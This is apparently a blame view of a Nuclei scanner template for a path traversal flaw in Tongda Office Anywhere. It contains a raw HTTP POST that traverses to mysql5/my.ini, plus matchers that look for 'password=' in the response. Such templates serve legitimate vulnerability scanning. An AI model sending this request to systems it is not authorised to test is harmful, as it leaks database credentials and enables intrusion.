nuclei-templates/vulnerabilities/tongda/tongda-path-traversal.yaml

46 lines
1020 B
YAML
Raw Normal View History

id: tongda-path-traversal
2021-02-14 12:22:51 +00:00
info:
name: Office Anywhere TongDa - Path Traversal
2021-02-14 12:22:51 +00:00
author: pikpikcu
severity: critical
2022-05-31 09:21:16 +00:00
description: |
Office Anywhere (OA) is susceptible to path traversal vulnerabilities which can be leveraged to perform remote code execution.
reference:
- https://github.com/jas502n/OA-tongda-RCE
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10.0
cwe-id: CWE-77
2021-02-14 12:22:51 +00:00
tags: tongda,lfi
requests:
- raw:
- |
POST /ispirit/interface/gateway.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
json={"url":"/general/../../mysql5/my.ini"}
matchers-condition: and
matchers:
2022-05-31 09:21:16 +00:00
2021-02-14 12:22:51 +00:00
- type: word
2022-05-31 09:21:16 +00:00
part: body
2021-02-14 12:22:51 +00:00
words:
- "[mysql]"
- "password="
condition: and
2022-05-31 09:21:16 +00:00
- type: word
part: header
words:
- "text/html"
2021-02-14 12:22:51 +00:00
- type: status
status:
- 200
# Enhanced by mp on 2022/05/30